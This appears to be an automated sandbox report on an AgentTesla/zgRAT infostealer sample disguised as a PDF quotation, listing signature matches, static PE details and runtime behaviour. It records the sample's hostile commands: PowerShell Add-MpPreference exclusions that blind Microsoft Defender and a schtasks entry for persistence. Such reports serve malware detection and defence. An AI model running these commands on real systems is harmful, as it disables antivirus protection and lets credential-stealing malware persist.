                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: UN-Quotation 70000000187366444_PDF.exe
                    Source: initial sampleStatic PE information: Filename: UN-Quotation 70000000187366444_PDF.exe
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b31647695u002d6883u002d4662u002d8F2Bu002dE00D8DA624E0u007d/F3EFBCD1u002d007Au002d4AC3u002d90FFu002d8DEDE43D3C38.csLarge array initialization: .cctor: array initializer size 11627
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37c4ec0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.37908a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.375a480.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B6CB24
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B6EF70
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B6EF62
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_02D4F380
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_02D4F6C8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064537F4
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064567D1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064534DC
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06454AF8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0645B1E0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064992E8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06497040
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649BC68
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064964C8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649ACD6
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649C085
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064932A8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662B2E8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_066277B8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662F0E8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06624928
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_066219B0
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662B988
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06622AB8
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06627757
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06620040
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06621159
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0662B924
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.295737787.0000000000318000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.304363401.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCqhnAxCocASFEJkffVoTOfMxGoHZD.exe4 vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000000.294293276.0000000000AF8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.512249842.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exeBinary or memory string: OriginalFilenameDisposit.exeF vs UN-Quotation 70000000187366444_PDF.exe
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: XrgnLg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: XrgnLg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UN-Quotation 70000000187366444_PDF.exeVirustotal: Detection: 37%
                    Source: UN-Quotation 70000000187366444_PDF.exeReversingLabs: Detection: 19%
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeJump to behavior
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile created: C:\Users\user\AppData\Roaming\XrgnLg.exeJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\tmp25F3.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/11@1/1
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_01
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\CidkzRETsJQhvv
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: XrgnLg.exe.0.dr, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: XrgnLg.exe.0.dr, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UN-Quotation 70000000187366444_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: UN-Quotation 70000000187366444_PDF.exe, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: XrgnLg.exe.0.dr, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.0.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.2.UN-Quotation 70000000187366444_PDF.exe.280000.0.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.5.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.3.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.2.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.1.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.7.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.9.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.2.UN-Quotation 70000000187366444_PDF.exe.a60000.1.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 10.0.UN-Quotation 70000000187366444_PDF.exe.a60000.13.unpack, dP/Cb.cs.Net Code: Fd System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 0_2_00B61C58 push ebx; iretd
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_02D46890 push FFFFFF8Bh; iretd
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06451518 push eax; retf
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_0649F69B push 8B000003h; iretd
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064932A8 push es; iretd
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064932A8 push es; iretd
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064918F6 push es; ret
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064918AA push es; ret
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064918BD push es; ret
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06492177 push edi; retn 0000h
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06491909 push es; ret
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064941D9 push es; iretd
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_064941D1 push es; iretd
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_066283D8 push 8B05F474h; retn 518Dh
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06620040 push es; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.847857536771399
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.847857536771399
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeFile created: C:\Users\user\AppData\Roaming\XrgnLg.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
